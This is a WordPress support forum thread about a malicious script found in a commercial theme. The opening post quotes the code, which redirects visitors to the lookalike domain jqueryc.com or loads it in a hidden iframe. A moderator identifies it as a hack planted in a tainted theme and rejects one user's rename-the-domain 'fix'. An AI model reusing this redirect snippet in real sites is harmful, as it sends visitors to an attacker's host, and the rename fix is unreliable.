• I see this:

    “/* NOTICE! You’ve requested a file that is not available for remote inclusion. */ try{ window.location = ‘https://www.jqueryc.com’; }catch(e){ var rframe = document.createElement(“iframe”); rframe.setAttribute(‘width’,’1px’); rframe.setAttribute(‘height’,’1px’); rframe.setAttribute(‘frameborder’,’0′); rframe.setAttribute(‘id’,’rfx’); rframe.setAttribute(‘src’,’https://www.jqueryc.com’); document.body.appendChild(rframe); }”

    What is it?
    PHP 5.3 or 5.4 – same situation.

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  • i am having the same problem with a certain themes… In case you find any solution please post here..

    i am having the same issue
    does any one knows how to fix it ?

    Having the same problem here.. no idea how to fix it ;(

    I’m sorry but as you are using a commercial theme, you need to seek support from the theme’s developer/vendor. We do not support commercial products here.

    I think i solved guys =),u go to ur theme editor,go to functions.php and search jqueryc.,change jqueryc and write jquery,for me problem solved.

    If im right tell me

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    It’s not a fix it’s a TUMOR. (Said in my best Arnold Schwarzenegger voice.)

    It’s a popular and particularly E-V-I-L? hack and people fall for this all the time. They (scary people) include something that sounds legitimate (it’s 100% not) and people believe that it’s just a typo.

    It’s not a typo. Either the site is hacked or you’ve gotten code from particularly nasty people and they inserted that code to hurt you.

    Seriously.

    So lose that theme or plugin like a bad embarrassing infection and delouse your installation. You want to do that right now, no kidding.

    Any advice to “fix it” while well meaning is just plain wrong.

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